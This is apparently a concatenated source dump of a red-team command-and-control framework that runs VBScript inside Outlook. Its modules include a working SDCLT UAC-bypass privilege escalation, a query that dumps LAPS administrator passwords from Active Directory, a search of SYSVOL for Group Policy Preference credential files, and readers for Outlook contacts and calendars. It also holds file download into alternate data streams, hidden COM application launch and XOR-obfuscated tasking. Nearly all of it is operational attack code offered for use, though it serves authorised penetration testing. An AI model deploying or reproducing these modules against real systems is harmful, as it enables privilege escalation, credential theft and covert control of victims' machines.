& vbCrlf 25 | End If 26 | remove_api = regdelres & filedelres 27 | else 28 | remove_api = regdelres 29 | End if 30 | 31 | 32 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_recyclebin.txt: -------------------------------------------------------------------------------- 1 | Function list_recyclebin() 2 | On error resume next 3 | Set sa = window.external.OutlookApplication.CreateObject("Shell.Application") 4 | Set items = sa.Namespace(10).Items() 5 | output = "Name - MB - FullPath" & vbCrLF 6 | sizeround = 1048576 7 | x = 0 8 | Do until x = items.count 9 | friendlysize = Round(items.item(x).size / sizeround, 1) 10 | output = output & items.item(x).name & " - " & friendlysize & " - " & items.item(x).path & vbCrLF 11 | x=x+1 12 | Loop 13 | 14 | ml1 = 0 15 | ml2 = 0 16 | ml3 = 0 17 | 18 | lines=split(output,vbcrlf) 19 | for each line in lines 20 | parts = Split(line, " - ") 21 | If Len(parts(0)) > ml1 Then 22 | ml1 = Len(parts(0)) 23 | End If 24 | If Len(parts(1)) > ml2 Then 25 | ml2 = Len(parts(1)) 26 | End If 27 | If Len(parts(2)) > ml3 Then 28 | ml3 = Len(parts(2)) 29 | End If 30 | next 31 | 32 | For Each line In lines 33 | parts = Split(line, " - ") 34 | spacesToAdd1 = ml1 - Len(parts(0)) 35 | spacesToAdd2 = ml2 - Len(parts(1)) 36 | spacesToAdd3 = ml3 - Len(parts(2)) 37 | line = parts(0) & String(spacesToAdd1, " ") & " " & parts(1) & String(spacesToAdd2, " ") & " " & parts(2) & String(spacesToAdd3, " ") 38 | list_recyclebin = list_recyclebin & line & vbCrLF 39 | Next 40 | End Function -------------------------------------------------------------------------------- /functions/trolling/play_voice.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import makeint, quotedstring 3 | from lib.tab_completers.generic import tab_choice 4 | from lib.validators.generic import ischoice 5 | 
6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This is a troll module, allows you to specify text as input and it will read it out loud on the speaker using sapi.spvoice 12 | 13 | It uses sapi.spvoice 14 | - Voice 15 | - speak 16 | """ 17 | self.entry = 'play_voice' 18 | self.depends = [] 19 | 20 | self.options['speaktext'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Text you want to say on the computer", 24 | "handler": quotedstring 25 | } 26 | self.options['voicegender'] = { 27 | "value": 0, 28 | "required": True, 29 | "description": "0 == male, and 1 == female", 30 | "handler": makeint, 31 | "validator": ischoice, 32 | "validatorargs": {'choices': ["0", "1"]}, 33 | "tab_complete": tab_choice, 34 | "tab_args": {'choices': ["0", "1"]} 35 | } 36 | super().__init__(templatepath) 37 | -------------------------------------------------------------------------------- /helperFunctions/Setregvalue_hkcu.txt: -------------------------------------------------------------------------------- 1 | Function SetRegValue_HKCU(PathToKey, RegType, ValueName, Value) 2 | On Error Resume Next 3 | SetRegValue_HKCU = "TEST " & PathToKey & " " & RegType & " " & ValueName & " " & Value 4 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 5 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 6 | objreg.CreateKey 2147483649, PathToKey 7 | If RegType = "REG_SZ" Then 8 | if ValueName = "@" Then 9 | objreg.SetStringValue 2147483649, PathToKey, "", Value 10 | SetRegValue_HKCU = "Value " & PathToKey & " " & ValueName & " Reg_Sz set to " & Value 11 | else 12 | objreg.SetStringValue 2147483649, PathToKey, ValueName, Value 13 | SetRegValue_HKCU = "Value " & PathToKey & " " & ValueName & " Reg_Sz set to " & Value 14 | end if 15 | ElseIf RegType = "REG_DWORD" Then 16 | if ValueName = "@" Then 17 | 
objreg.SetDWORDValue 2147483649, PathToKey, "", Value 18 | SetRegValue_HKCU = "Value " & PathToKey & " " & ValueName & " Reg_Dword set to " & Value 19 | else 20 | objreg.SetDWORDValue 2147483649, PathToKey, ValueName, Value 21 | SetRegValue_HKCU = "Value " & PathToKey & " " & ValueName & " Reg_Dword set to " & Value 22 | End if 23 | Else 24 | SetRegValue_HKCU = RegType & " Not implemented yet" 25 | End If 26 | End Function -------------------------------------------------------------------------------- /functions/execute/host/uac-sdclt.txt: -------------------------------------------------------------------------------- 1 | Function Execute_UAC_sdclt() 2 | On Error Resume Next 3 | Execute_UAC_sdclt = "SDCLT UAC BYPASS" & vbCrLf 4 | Execute_UAC_sdclt = Execute_UAC_sdclt & SetRegValue_HKCU("Software\Classes\Folder\shell\open\command", "REG_SZ", "@", {{command}}) 5 | Execute_UAC_sdclt = Execute_UAC_sdclt & vbCrLf 6 | Execute_UAC_sdclt = Execute_UAC_sdclt & SetRegValue_HKCU("Software\Classes\Folder\shell\open\command", "REG_SZ", "DelegateExecute", " ") 7 | Execute_UAC_sdclt = Execute_UAC_sdclt & vbCrLf 8 | 9 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 10 | Set objService = objLocator.ConnectServer(".", "root\cimv2") 11 | Set objConfig = objService.Get("Win32_ProcessStartup").SpawnInstance_() 12 | Set objProcess = objService.Get("Win32_Process") 13 | objProcess.Create "explorer /root,c:\windows\system32\sdclt.exe", Null, objConfig, varProcessId 14 | Execute_UAC_sdclt = Execute_UAC_sdclt & "Executed sdclt.exe to trigger UAC bypass" & vbCrLf & "Process id sdclt.exe: " & varProcessId 15 | Execute_UAC_sdclt = Execute_UAC_sdclt & vbCrLf 16 | 17 | 'Sleep 18 | Execute_UAC_sdclt = Execute_UAC_sdclt & "Running cleanup in 45 seconds (delete command reg key)" 19 | window.clearTimeout(st) 20 | st = window.setTimeout("wait", 45000, "VBScript") 21 | End Function 22 | 23 | Sub wait() 24 | 
DelRegKey_HKCU("Software\Classes\Folder\shell\open\command") 25 | End Sub -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_lapspassword.txt: -------------------------------------------------------------------------------- 1 | Function list_lapspassword() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT DS_ms_Mcs_AdmPwd FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT DS_ms_Mcs_AdmPwd,DS_sAMAccountName,DS_ms_Mcs_AdmPwdExpirationTime FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL") 8 | 9 | For Each PATH in colItems 10 | For Each pathAttribute in PATH.Properties_ 11 | Select Case TypeName(pathAttribute.value) 12 | case "String" 13 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 14 | case "Long" 15 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 16 | case "Boolean" 17 | Returndata = Returndata & pathAttribute.name & "BOOL:" & pathAttribute.value & vbCrLf 18 | case "SWbemObjectEx" 19 | 'Cannot get this work... 
20 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 21 | case "Variant()" 22 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 23 | End Select 24 | Next 25 | Returndata = Returndata & vbCrLf 26 | Next 27 | list_lapspassword = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/read_contacts.txt: -------------------------------------------------------------------------------- 1 | Function read_contacts() 2 | on error resume next 3 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")).GetDefaultFolder(10) 4 | 5 | Set oItems = folder.items 6 | read_contacts = "Getting Contacts items from - " & folder.folderpath & vbCrLf & vbCrLf 7 | For i = 1 To oItems.count 8 | if (oItems(i).class = 40) then 9 | read_contacts = read_contacts & "-= Contact object =-" & vbCrLf 10 | read_contacts = read_contacts & "Email: " & oItems(i).Email1Address & vbCrLf 11 | read_contacts = read_contacts & "Email2: " & oItems(i).Email2Address & vbCrLf 12 | read_contacts = read_contacts & "FileAs: " & oItems(i).FileAs & vbCrLf 13 | read_contacts = read_contacts & "FirstName: " & oItems(i).FirstName & vbCrLf 14 | read_contacts = read_contacts & "LastName: " & oItems(i).LastName & vbCrLf 15 | read_contacts = read_contacts & "LastNameAndFirstName : " & oItems(i).LastNameAndFirstName & vbCrLf 16 | read_contacts = read_contacts & "MobileTelephoneNumber : " & oItems(i).MobileTelephoneNumber & vbCrLf 17 | read_contacts = read_contacts & "PrimaryTelephoneNumber : " & oItems(i).PrimaryTelephoneNumber & vbCrLf 18 | read_contacts = read_contacts & "Webpage : " & oItems(i).WebPage & vbCrLf 19 | read_contacts = read_contacts & "OfficeLocation : " & oItems(i).OfficeLocation & vbCrLf 20 | read_contacts = read_contacts & vbCrLf 21 | end if 22 | next 23 | End Function -------------------------------------------------------------------------------- 
/functions/operation/outlook/read_calendar.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makeint,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This module allows you to read calendar items. 12 | 13 | It uses OutlookApplication 14 | - GetNameSpace("MAPI").GetDefaultFolder(9) 15 | - GetNameSpace("MAPI").GetDefaultFolder(9).items 16 | """ 17 | self.entry = 'read_calendar' 18 | self.depends = [] 19 | self.options['days_to_read'] = { 20 | "value": 7, 21 | "required": True, 22 | "description": "The number of days ahead of time you want to view the calendar for", 23 | "handler": makeint 24 | } 25 | self.options['include_body'] = { 26 | "value": "True", 27 | "required": True, 28 | "description": "List out the body of the meeting", 29 | "handler": makebool, 30 | "validator": ischoice, 31 | "validatorargs": {'choices': ["False", "True"]}, 32 | "tab_complete": tab_choice, 33 | "tab_args": {'choices': ["False", "True"]} 34 | } 35 | super().__init__(templatepath) -------------------------------------------------------------------------------- /helperFunctions/base64.txt: -------------------------------------------------------------------------------- 1 | Function Base64Encode(ByVal sText, ByVal fAsUtf16LE) 2 | 3 | ' Use an aux. XML document with a Base64-encoded element. 4 | ' Assigning the byte stream (array) returned by StrToBytes() to .NodeTypedValue 5 | ' automatically performs Base64-encoding, whose result can then be accessed 6 | ' as the element's text. 
7 | With CreateObject("Msxml2.DOMDocument").CreateElement("aux") 8 | .DataType = "bin.base64" 9 | if fAsUtf16LE then 10 | .NodeTypedValue = StrToBytes(sText, "utf-16le", 2) 11 | else 12 | .NodeTypedValue = StrToBytes(sText, "utf-8", 3) 13 | end if 14 | Base64Encode = .Text 15 | End With 16 | 17 | End Function 18 | 19 | function StrToBytes(ByVal sText, ByVal sTextEncoding, ByVal iBomByteCount) 20 | 21 | ' Create a text string with the specified encoding and then 22 | ' get its binary (byte array) representation. 23 | With CreateObject("ADODB.Stream") 24 | ' Create a stream with the specified text encoding... 25 | .Type = 2 ' adTypeText 26 | .Charset = sTextEncoding 27 | .Open 28 | .WriteText sText 29 | ' ... and convert it to a binary stream to get a byte-array 30 | ' representation. 31 | .Position = 0 32 | .Type = 1 ' adTypeBinary 33 | .Position = iBomByteCount ' skip the BOM 34 | StrToBytes = .Read 35 | .Close 36 | End With 37 | 38 | end function -------------------------------------------------------------------------------- /functions/operation/outlook/changeview_outlookfolder.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makeint,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This module allows you to change the view for the user in Outlook. 
12 | You can use this to for instance navigate the user to the calendar/tasks/junk etc 13 | 14 | folder option should be set to int value found here: 15 | https://docs.microsoft.com/en-us/office/vba/api/outlook.oldefaultfolders 16 | That means, 17 | outbox would be 4 18 | inbox would be 6 19 | sent would be 5 20 | tasks would be 13 21 | calendar would be 9 22 | junk would be 23 23 | 24 | It uses OutlookApplication 25 | - GetNameSpace("MAPI").GetDefaultFolder(VARIABLE) 26 | - ActiveExplorer.CurrentFolder 27 | """ 28 | self.entry = 'changeview_outlookfolder' 29 | self.depends = [] 30 | self.options['folder'] = { 31 | "value": None, 32 | "required": True, 33 | "description": "Folder to hide or unhide", 34 | "handler": makeint 35 | } 36 | super().__init__(templatepath) 37 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributions 2 | If you are considering contributing to our repository, first thank you for doing so!
3 | 4 | Contributions from community members are more than welcome; there are a few items that you should be aware of for a smooth process.
5 | 6 | At this time we will not be accepting new functional changes to the provided COM object. If you find an error in the 7 | existing code, we will accept a pull to fix that within the COM object. 8 | 9 | ## Technique Expectations 10 | * Capabilities should run without causing outlook.exe to lock up. 11 | * Capabilities should account for errors that may occur and handle them 12 | 13 | ## Code Expectations 14 | * python code should be coded to work from version 3.9 to 3.11 15 | * Any additions to helperFunctions should be well-formed and usable from other vbs scripts 16 | * Removal of intentionally placed IOCs will be rejected 17 | * Again, any updates to code under api/* should be error-correcting in nature only, not feature additions. 18 | 19 | ## What to expect as a contributor 20 | After your contribution is received, it will receive an in-depth code review and testing.
21 | After testing is completed, we will have zero or more rounds of change requests based on findings until there are no issues in the code. At that point it will be accepted into the repository, and your github username will be added to our credit list (if you would prefer not to be added or some other handle to be used, just let me know) 22 | -------------------------------------------------------------------------------- /functions/execute/host/remove_homepage.txt: -------------------------------------------------------------------------------- 1 | Function remove_homepage() 2 | On Error Resume Next 3 | Set objContext = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemNamedValueSet") 4 | objContext.Add"__ProviderArchitecture",RegType 5 | objContext.Add"__RequiredArchitecture",True 6 | 7 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 8 | Set objServices = objLocator.ConnectServer(".", "root\cimv2") 9 | Set objReg=objServices.Get("StdRegProv") 10 | 11 | objReg.GetStringValue 2147483648, "Word.Application\CurVer", "", o3 12 | over = Right(o3, 2) & ".0" 13 | 14 | strcrSecPth = "Software\Microsoft\Office\" + over + "\Outlook\UserInfo" 15 | strKSecPth = "Software\Microsoft\Office\" + over + "\Outlook\Security" 16 | strKWebPth = "Software\Microsoft\Office\" + over + "\Outlook\Webview\inbox" 17 | strKey1EntryName = "EnableRoamingFolderHomepages" 18 | strKey2EntryName = "URL" 19 | strKey3EntryName = "KEY" 20 | 21 | objReg.deletevalue 2147483649, strKSecPth,strKey1EntryName 22 | objReg.deletevalue 2147483649, strKWebPth,strKey2EntryName 23 | objReg.deletevalue 2147483649, strcrSecPth,strKey3EntryName 24 | 25 | Set calfolder = window.external.OutlookApplication.GetNameSpace("MAPI").GetDefaultFolder(9) 26 | Set window.external.OutlookApplication.ActiveExplorer.CurrentFolder = calfolder 27 | remove_homepage = "Registry values removed and Outlook changed view to calendar" 28 | End Function 
-------------------------------------------------------------------------------- /functions/execute/host/uac-sdclt.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | DETECTED BY WINDOWS DEFENDER AS 11 | Behavior:Win32/UACBypassExp.T!proc 12 | 13 | Execute a command using the SDCLT.exe UAC bypass. 14 | This module sets HKCU\\Software\\Classes\\Folder\\shell\open\\command default value to the specified command option. 15 | It also sets the DelegateExecute under the same path and executes: 16 | explorer.exe /root,c:\windows\system32\sdclt.exe 17 | Execution through win32_process create 18 | 19 | It uses WbemScripting.SWbemLocator 20 | - ConnectServer(root\cimv2) 21 | - ConnectServer(root\cimv2).Get("Win32_ProcessStartup").SpawnInstance_() 22 | - ConnectServer(root\cimv2).Get("Win32_Process") 23 | 24 | """ 25 | self.entry = 'Execute_UAC_sdclt' 26 | self.depends = ['./helperFunctions/Setregvalue_hkcu.txt','./helperFunctions/Delregkey_hkcu.txt'] 27 | self.options['command'] = { 28 | "value": None, 29 | "required": True, 30 | "description": "Command to execute on remote target", 31 | "handler": quotedstring 32 | } 33 | super().__init__(templatepath) 34 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_gpp.txt: -------------------------------------------------------------------------------- 1 | Function list_gpp() 2 | On error resume next 3 | Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell") 4 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 5 | dom = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%") 6 | polpath = 
"C:\Windows\sysnative\GroupPolicy\DataStore\0\sysvol\" & dom & "\Policies\" 7 | If fs.FolderExists(polpath) = True Then 8 | output = "Found " & "C:\Windows\sysnative\GroupPolicy\DataStore\0\sysvol\" & dom & "\Policies\" & vbCrLf 9 | output = output & "Searching for Groups.xml" & vbCrLf & dir_lister(polpath, 0, 4, "xml", "Groups", True, "mb") & vbCrLf 10 | output = output & "Searching for Drives.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Drives", True, "mb") & vbCrLf 11 | output = output & "Searching for Services.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Services", True, "mb") & vbCrLf 12 | output = output & "Searching for ScheduledTasks.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "ScheduledTasks", True, "mb") & vbCrLf 13 | output = output & "Searching for Datasources.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Datasources", True, "mb") & vbCrLf 14 | output = output & "Searching for Printers.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Printers", True, "mb") & vbCrLf 15 | else 16 | output = "Local Policy Folder not found at " & polpath 17 | End If 18 | list_gpp = output 19 | End Function -------------------------------------------------------------------------------- /functions/operation/file/download_filehttp.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module is used to download from the specified url in the surl option and save it on the Specula agent. 10 | You specify where you want the file to be stored in the destpath option. 
11 | It also supports AlternateDataStreams, meaning you can specify destpath as c:\\temp\\file.txt:nothere 12 | 13 | It uses MSXML2.ServerXMLHTTP 14 | - open 15 | - send 16 | - status 17 | - ResponseBody 18 | 19 | It used ADODB.STREAM 20 | - Type 21 | - open 22 | - write 23 | - savetofile 24 | - close 25 | """ 26 | self.entry = 'download_filehttp' 27 | self.depends = [] 28 | self.options['url'] = { 29 | "value": None, 30 | "required": True, 31 | "description": "URL the agent will attempt to download this file from", 32 | "handler": quotedstring 33 | } 34 | self.options['destination'] = { 35 | "value": None, 36 | "required": True, 37 | "description": "path on disk the agent will attempt to write the downloaded file to", 38 | "handler": quotedstring 39 | } 40 | super().__init__(templatepath) 41 | -------------------------------------------------------------------------------- /Taskbooks/enum_installed_software.py: -------------------------------------------------------------------------------- 1 | def TaskBook(helpers, agent): 2 | mod = helpers.get_module('operation/file/list_dir') 3 | helpers.setModOption(mod, 'directory', optval="c:\Program Files") 4 | helpers.setModOption(mod, 'recurselevels', optval="0") 5 | helpers.setModOption(mod, 'depth', optval="0") 6 | helpers.setModOption(mod, 'filetype', optval="*") 7 | helpers.setModOption(mod, 'filename', optval="*") 8 | helpers.setModOption(mod, 'nodirectories', optval="False") 9 | helpers.setModOption(mod, 'sizeformat', optval="mb") 10 | helpers.setModOption(mod, 'nofiles', optval="True") 11 | helpers.setModOption(mod, 'output_console', optval="False") 12 | helpers.insertTask(agent, mod, 'operation/file/list_dir') 13 | 14 | mod = helpers.get_module('operation/file/list_dir') 15 | helpers.setModOption(mod, 'directory', optval="c:\Program Files (x86)") 16 | helpers.setModOption(mod, 'recurselevels', optval="0") 17 | helpers.setModOption(mod, 'depth', optval="0") 18 | helpers.setModOption(mod, 'filetype', optval="*") 19 
| helpers.setModOption(mod, 'filename', optval="*") 20 | helpers.setModOption(mod, 'nodirectories', optval="False") 21 | helpers.setModOption(mod, 'sizeformat', optval="mb") 22 | helpers.setModOption(mod, 'nofiles', optval="True") 23 | helpers.setModOption(mod, 'output_console', optval="False") 24 | helpers.insertTask(agent, mod, 'operation/file/list_dir') 25 | 26 | mod = helpers.get_module('enumerate/host/list_installedapps') 27 | helpers.insertTask(agent, mod, 'enumerate/host/list_installedapps') -------------------------------------------------------------------------------- /functions/enumerate/host/list_applocker.txt: -------------------------------------------------------------------------------- 1 | Function list_applocker() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | 6 | ALlog = "Enumerate AppLocker status:" & vbCrLf 7 | KeyPathAL = "Software\Policies\Microsoft\Windows\SrpV2\" 8 | results = objReg.EnumKey(2147483650, KeyPathAL, arrSubkeysAL) 9 | If results <> 0 Then 10 | ALlog = ALlog & "AppLocker disabled!" 11 | list_applocker = ALlog 12 | Else 13 | ALlog = ALlog & "AppLocker enabled!" 
& vbCrlf 14 | For Each strSubkeyAL In arrSubkeysAL 15 | status = objReg.GetDwordValue(2147483650, KeyPathAL & strSubkeyAL, "EnforcementMode", sectionMode) 16 | If status <> 0 Then 17 | val = "Not Enabled" 18 | Else 19 | If sectionMode = 1 Then 20 | val = "Enforced" 21 | ElseIf sectionMode = 0 Then 22 | val = "Auditing" 23 | End If 24 | resul = objReg.EnumKey(2147483650, KeyPathAL & strSubKeyAL, arrSectionSub) 25 | AppLockerRules = AppLockerRules & "AppLocker Rule section: " & strSubKeyAL & vbCrlf 26 | For Each strSub in arrSectionSub 27 | res = objReg.GetStringValue(2147483650, KeyPathAL & strSubKeyAL & "\" & strSub, "Value", outrules) 28 | AppLockerRules = AppLockerRules & outrules & vbCrlf 29 | Next 30 | End If 31 | ALlog = ALlog & "EnforcementMode for " & strSubKeyAl & " Is " & val & vbCrlf 32 | Next 33 | list_applocker = ALlog & vbCrlf & AppLockerRules 34 | End If 35 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_user.txt: -------------------------------------------------------------------------------- 1 | Function list_user() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT * FROM ds_user Where DS_sAMAccountName = '" & {{samaccountname}} & "'" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_user Where DS_sAMAccountName = '" & {{samaccountname}} & "'") 8 | 9 | if Not colItems.count <= 0 then 10 | Returndata = Returndata & "samaccountname lookup successful:" & vbCrLf 11 | 12 | For Each PATH in colItems 13 | For Each pathAttribute in PATH.Properties_ 14 | Select Case TypeName(pathAttribute.value) 15 | case "String" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "Long" 18 | Returndata = Returndata & 
pathAttribute.name & ":" & pathAttribute.value & vbCrLf 19 | case "Boolean" 20 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 21 | case "SWbemObjectEx" 22 | 'Cannot get this work... 23 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 24 | case "Variant()" 25 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 26 | End Select 27 | Next 28 | Next 29 | else 30 | Returndata = Returndata & {{samaccountname}} & " not found" & vbCrLf 31 | end if 32 | list_user = Returndata 33 | End Function -------------------------------------------------------------------------------- /functions/execute/host/application.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Executes the specified COM application hidden. 11 | Application is specified setting the com_application option. It defaults to word.application. 12 | Note that some of the applications starts and immmediatly terminates. 13 | 14 | Typical application are: 15 | - word.application 16 | - excel.application 17 | - powerpoint.application 18 | - access.application 19 | - oneNote.application 20 | - publisher.application 21 | 22 | Full list of objects can be found using this Powershell oneliner: 23 | gci HKLM:\\Software\\Classes -ea 0| ? 
{$_.PSChildName -match '^\\w+\\.\\w+$' -and (gp "$($_.PSPath)\\CLSID" -ea 0)} | ft PSChildName 24 | 25 | The executed application gets the parent pid of SVCHost.exe (C:\Windows\system32\svchost.exe -k DcomLaunch -p) 26 | 27 | It uses CreateObject(Specified com application) 28 | """ 29 | self.entry = 'Execute_Application' 30 | self.depends = [] 31 | self.options['com_application'] = { 32 | "value": "word.application", 33 | "required": True, 34 | "description": "COM application to start", 35 | "handler": quotedstring 36 | } 37 | super().__init__(templatepath) 38 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_passwordpolicy.txt: -------------------------------------------------------------------------------- 1 | Function list_passwordpolicy() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns") 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & "BOOL:" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 
19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | list_passwordpolicy = Returndata 27 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_computer.txt: -------------------------------------------------------------------------------- 1 | Function list_computer() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT * FROM ds_computer Where DS_sAMAccountName = '" & {{samaccountname}} & "'" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_computer Where DS_sAMAccountName = '" & {{samaccountname}} & "'") 8 | 9 | if Not colItems.count <= 0 then 10 | Returndata = Returndata & "samaccountname lookup successful:" & vbCrLf 11 | 12 | For Each PATH in colItems 13 | For Each pathAttribute in PATH.Properties_ 14 | Select Case TypeName(pathAttribute.value) 15 | case "String" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "Long" 18 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 19 | case "Boolean" 20 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 21 | case "SWbemObjectEx" 22 | 'Cannot get this work... 
23 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 24 | case "Variant()" 25 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 26 | End Select 27 | Next 28 | Next 29 | else 30 | Returndata = Returndata & {{samaccountname}} & " not found" & vbCrLf 31 | end if 32 | list_computer = Returndata 33 | End Function -------------------------------------------------------------------------------- /lib/core/utility.py: -------------------------------------------------------------------------------- 1 | import re 2 | from lib.core.setup import gconfig 3 | from datetime import datetime 4 | 5 | def encrypt_code(code, key): 6 | Position = -1 7 | z = "" 8 | for i in range(len(code)): 9 | Position = Position + 1 10 | if Position >= len(key): 11 | Position = 0 12 | 13 | keynumber = ord(key[Position:Position + 1]) 14 | org = ord(code[i:i + 1]) 15 | cpt = org ^ keynumber 16 | cptstr = hex(cpt)[2:] 17 | if len(cptstr) < 2: 18 | cptstr = "0" + cptstr 19 | z = z + cptstr 20 | return z 21 | 22 | 23 | def decrypt_code(code, key): 24 | Position = -1 25 | z = "" 26 | chars = re.findall('..', code) # get each byte/char 27 | 28 | for i in range(len(chars)): 29 | Position = Position + 1 30 | if Position >= len(key): 31 | Position = 0 32 | 33 | keynumber = ord(key[Position:Position + 1]) 34 | decstr = int(chars[i], 16) ^ keynumber # ^ is XOR int,16 converts hex to decimal value 35 | z = z + chr(decstr) 36 | return z 37 | 38 | 39 | class TaskClass: 40 | def __init__(self, funcname, code, entry, options, encrypt=True, status=None, printlog=True): 41 | self.name = funcname 42 | self.code = code 43 | if gconfig.DEBUG: 44 | print(code) 45 | if status is not None: 46 | self.status = status 47 | self.printlog = printlog 48 | self.entry = entry 49 | self.encrypt = encrypt 50 | self.options = options 51 | self.added = datetime.now().strftime(gconfig.TIME_FORMAT) 52 | 53 | -------------------------------------------------------------------------------- 
